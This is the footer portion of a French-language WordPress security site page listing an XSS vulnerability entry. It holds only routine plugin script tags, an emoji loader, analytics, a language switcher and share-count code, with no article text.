<script src="https://wp-security.org/wp-content/plugins/powerkit/assets/js/_scripts.js?ver=3.0.7" id="powerkit-js"></script>
<script src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.5" id="swv-js"></script>
<script id="contact-form-7-js-translations">
( function( domain, translations ) {
var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
localeData[""].domain = domain;
wp.i18n.setLocaleData( localeData, domain );
} )( "contact-form-7", {"translation-revision-date":"2025-02-06 12:02:14+0000","generator":"GlotPress\/4.0.3","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n > 1;","lang":"fr"},"This contact form is placed in the wrong place.":["Ce formulaire de contact est plac\u00e9 dans un mauvais endroit."],"Error:":["Erreur\u00a0:"]}},"comment":{"reference":"includes\/js\/index.js"}} );
//# sourceURL=contact-form-7-js-translations
</script>
<script id="contact-form-7-js-before">
var wpcf7 = {
"api": {
"root": "https:\/\/wp-security.org\/fr\/wp-json\/",
"namespace": "contact-form-7\/v1"
},
"cached": 1
};
//# sourceURL=contact-form-7-js-before
</script>
<script src="https://wp-security.org/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.5" id="contact-form-7-js"></script>
<script id="disqus_count-js-extra">
var countVars = {"disqusShortname":"wp-security-org"};
//# sourceURL=disqus_count-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.1.4" id="disqus_count-js"></script>
<script id="disqus_embed-js-extra">
var embedVars = {"disqusConfig":{"integration":"wordpress 3.1.4 6.9.4"},"disqusIdentifier":"803 https://wp-security.org/uncategorized/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","disqusShortname":"wp-security-org","disqusTitle":"Hong Kong Security NGO warns WordPress XSS(CVE20258685)","disqusUrl":"https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/","postId":"803"};
//# sourceURL=disqus_embed-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/disqus-comment-system/public/js/comment_embed.js?ver=3.1.4" id="disqus_embed-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/basic-elements/public/js/public-powerkit-basic-elements.js?ver=4.0.0" id="powerkit-basic-elements-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/justified-gallery/block/jquery.justifiedGallery.min.js?ver=2.5.2" id="justifiedgallery-js"></script>
<script id="powerkit-justified-gallery-js-extra">
var powerkitJG = {"rtl":""};
//# sourceURL=powerkit-justified-gallery-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/justified-gallery/public/js/public-powerkit-justified-gallery.js?ver=3.0.7" id="powerkit-justified-gallery-js"></script>
<script src="https://wp-security.org/wp-includes/js/imagesloaded.min.js?ver=5.0.0" id="imagesloaded-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/glightbox.min.js?ver=3.0.7" id="glightbox-js"></script>
<script id="powerkit-lightbox-js-extra">
var powerkit_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of","single_image_selectors":".entry-content img,.single .post-media img","gallery_selectors":".wp-block-gallery,.gallery","exclude_selectors":".sight-portfolio-area","zoom_icon":"1"};
//# sourceURL=powerkit-lightbox-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/lightbox/public/js/public-powerkit-lightbox.js?ver=3.0.7" id="powerkit-lightbox-js"></script>
<script id="powerkit-opt-in-forms-js-extra">
var opt_in = {"ajax_url":"https://wp-security.org/wp-admin/admin-ajax.php","warning_privacy":"Please confirm that you agree with our policies.","is_admin":"","server_error":"Server error occurred. Please try again later."};
//# sourceURL=powerkit-opt-in-forms-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/opt-in-forms/public/js/public-powerkit-opt-in-forms.js?ver=3.0.7" id="powerkit-opt-in-forms-js"></script>
<script async="async" defer="defer" src="//assets.pinterest.com/js/pinit.js?ver=6.9.4" id="powerkit-pinterest-js"></script>
<script id="powerkit-pin-it-js-extra">
var powerkit_pinit_localize = {"image_selectors":".entry-content img","exclude_selectors":".cnvs-block-row,.cnvs-block-section,.cnvs-block-posts .entry-thumbnail,.cnvs-post-thumbnail,.pk-block-author,.pk-featured-categories img,.pk-inline-posts-container img,.pk-instagram-image,.pk-subscribe-image,.wp-block-cover,.pk-block-posts,.sight-portfolio-entry-link-page","only_hover":"1"};
//# sourceURL=powerkit-pin-it-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/pinterest/public/js/public-powerkit-pin-it.js?ver=3.0.7" id="powerkit-pin-it-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/scroll-to-top/public/js/public-powerkit-scroll-to-top.js?ver=3.0.7" id="powerkit-scroll-to-top-js"></script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/share-buttons/public/js/public-powerkit-share-buttons.js?ver=3.0.7" id="powerkit-share-buttons-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/slider-gallery/block/flickity.pkgd.min.js?ver=2.5.2" id="flickity-js"></script>
<script id="powerkit-slider-gallery-js-extra">
var powerkit_sg_flickity = {"page_info_sep":" of "};
//# sourceURL=powerkit-slider-gallery-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/slider-gallery/public/js/public-powerkit-slider-gallery.js?ver=3.0.7" id="powerkit-slider-gallery-js"></script>
<script id="powerkit-table-of-contents-js-extra">
var powerkit_toc_config = {"label_show":"Show","label_hide":"Hide"};
//# sourceURL=powerkit-table-of-contents-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/powerkit/modules/table-of-contents/public/js/public-powerkit-table-of-contents.js?ver=3.0.7" id="powerkit-table-of-contents-js"></script>
<script src="https://wp-security.org/wp-content/plugins/sight/render/js/jquery.magnific-popup.min.js?ver=1774098503" id="magnific-popup-js"></script>
<script id="sight-block-script-js-extra">
var sight_lightbox_localize = {"text_previous":"Previous","text_next":"Next","text_close":"Close","text_loading":"Loading","text_counter":"of"};
//# sourceURL=sight-block-script-js-extra
</script>
<script src="https://wp-security.org/wp-content/plugins/sight/render/js/sight.js?ver=1774098503" id="sight-block-script-js"></script>
<script src="https://wp-security.org/wp-content/plugins/canvas/components/posts/block-posts/colcade.js?ver=2.5.2" id="colcade-js"></script>
<script src="https://wp-security.org/wp-content/themes/squaretype/js/ofi.min.js?ver=3.2.3" id="object-fit-images-js"></script>
<script id="csco-scripts-js-extra">
var csco_mega_menu = {"rest_url":"https://wp-security.org/fr/wp-json/csco/v1/menu-posts","current_lang":"","current_locale":"fr_FR"};
//# sourceURL=csco-scripts-js-extra
</script>
<script src="https://wp-security.org/wp-content/themes/squaretype/js/scripts.js?ver=3.1.1" id="csco-scripts-js"></script>
<script src="https://wp-security.org/wp-includes/js/comment-reply.min.js?ver=6.9.4" id="comment-reply-js" async data-wp-strategy="async" fetchpriority="low"></script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://wp-security.org/wp-includes/js/wp-emoji-release.min.js?ver=6.9.4"}}
</script>
<script type="module">
/*! This file is auto-generated */
const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))});
//# sourceURL=https://wp-security.org/wp-includes/js/wp-emoji-loader.min.js
</script>
<div style="position:absolute;margin:-1px;padding:0;height:1px;width:1px;overflow:hidden;clip-path:inset(50%);border:0;word-wrap:normal !important;"><p id="a11y-speak-intro-text" class="a11y-speak-intro-text" hidden data-no-translation="" data-trp-gettext="">Notifications</p><div id="a11y-speak-assertive" class="a11y-speak-region" aria-live="assertive" aria-relevant="additions text" aria-atomic="true"></div><div id="a11y-speak-polite" class="a11y-speak-region" aria-live="polite" aria-relevant="additions text" aria-atomic="true"></div></div>
<!-- Usermaven - privacy-friendly analytics tool -->
<script type="text/javascript">
(function () {
window.usermaven = window.usermaven || (function () { (window.usermavenQ = window.usermavenQ || []).push(arguments); })
var t = document.createElement('script'),
s = document.getElementsByTagName('script')[0];
t.defer = true;
t.id = 'um-tracker';
t.setAttribute('data-tracking-host', 'https://u.wp-security.org');
t.setAttribute('data-key', 'UMZaYew9Sp');
t.setAttribute('data-autocapture', 'true'); t.setAttribute('data-randomize-url', 'true');
t.src = 'https://u.wp-security.org/lib.js';
s.parentNode.insertBefore(t, s);
})();
</script>
<!-- / Usermaven -->
<nav
class="trp-language-switcher trp-floating-switcher trp-ls-dropdown trp-switcher-position-bottom"
style="--bg:#ffffffb2;--bg-hover:#0000000d;--text:#000000;--text-hover:#000000;--border:1px solid transparent;--border-radius:8px 8px 0px 0px;--flag-radius:2px;--flag-size:20px;--aspect-ratio:4/3;--font-size:16px;--switcher-width:auto;--switcher-padding:10px 0;--transition-duration:0.2s;--bottom:0px;--right:10vw"
role="navigation"
aria-label="Sélecteur de langue du site Web"
data-no-translation
>
<div class="trp-language-switcher-inner">
<div class="trp-language-item trp-language-item__current" title="French" role="button" tabindex="0" aria-expanded="false" aria-label="Change language" aria-controls="trp-switcher-dropdown-list" data-no-translation><span class="trp-language-item-name">French</span></div>
<div
class="trp-switcher-dropdown-list"
id="trp-switcher-dropdown-list"
role="group"
aria-label="Langues disponibles"
hidden
inert
>
<a href="https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="English" data-no-translation><span class="trp-language-item-name">English</span></a> <a href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Chinese (Hong Kong)" data-no-translation><span class="trp-language-item-name">Chinese (Hong Kong)</span></a> <a href="https://wp-security.org/zh_cn/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Chinese (China)" data-no-translation><span class="trp-language-item-name">Chinese (China)</span></a> <a href="https://wp-security.org/es/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Spanish" data-no-translation><span class="trp-language-item-name">Spanish</span></a> <a href="https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="trp-language-item" title="Hindi" data-no-translation><span class="trp-language-item-name">Hindi</span></a> </div>
</div>
</nav>
<script type="text/javascript">
"use strict";
(function($) {
$( window ).on( 'load', function() {
// Each All Share boxes.
$( '.pk-share-buttons-mode-rest' ).each( function() {
var powerkitButtonsIds = [],
powerkitButtonsBox = $( this );
// Check Counts.
if ( ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-counts' ) && ! powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) ) {
return;
}
powerkitButtonsBox.find( '.pk-share-buttons-item' ).each( function() {
if ( $( this ).attr( 'data-id' ).length > 0 ) {
powerkitButtonsIds.push( $( this ).attr( 'data-id' ) );
}
});
// Generate accounts data.
var powerkitButtonsData = {};
if( powerkitButtonsIds.length > 0 ) {
powerkitButtonsData = {
'ids' : powerkitButtonsIds.join(),
'post_id' : powerkitButtonsBox.attr( 'data-post-id' ),
'url' : powerkitButtonsBox.attr( 'data-share-url' ),
};
}
// Get results by REST API.
$.ajax({
type: 'GET',
url: 'https://wp-security.org/fr/wp-json/social-share/v1/get-shares',
data: powerkitButtonsData,
beforeSend: function(){
// Add Loading Class.
powerkitButtonsBox.addClass( 'pk-share-buttons-loading' );
},
success: function( response ) {
if ( ! $.isEmptyObject( response ) && ! response.hasOwnProperty( 'code' ) ) {
// Accounts loop.
$.each( response, function( index, data ) {
if ( index !== 'total_count' ) {
// Find Bsa Item.
var powerkitButtonsItem = powerkitButtonsBox.find( '.pk-share-buttons-item[data-id="' + index + '"]');
// Set Count.
if ( data.hasOwnProperty( 'count' ) && data.count ) {
powerkitButtonsItem.removeClass( 'pk-share-buttons-no-count' ).addClass( 'pk-share-buttons-item-count' );
powerkitButtonsItem.find( '.pk-share-buttons-count' ).html( data.count );
} else {
powerkitButtonsItem.addClass( 'pk-share-buttons-no-count' );
}
}
});
if ( powerkitButtonsBox.hasClass( 'pk-share-buttons-has-total-counts' ) && response.hasOwnProperty( 'total_count' ) ) {
var powerkitButtonsTotalBox = powerkitButtonsBox.find( '.pk-share-buttons-total' );
if ( response.total_count ) {
powerkitButtonsTotalBox.find( '.pk-share-buttons-count' ).html( response.total_count );
powerkitButtonsTotalBox.show().removeClass( 'pk-share-buttons-total-no-count' );
}
}
}
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
},
error: function() {
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
}
});
});
});
})(jQuery);
</script>
</body>
</html>
<!--
Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com
10898 objets récupérés (1 Mo) depuis Redis grâce à PhpRedis (v6.3.0).
-->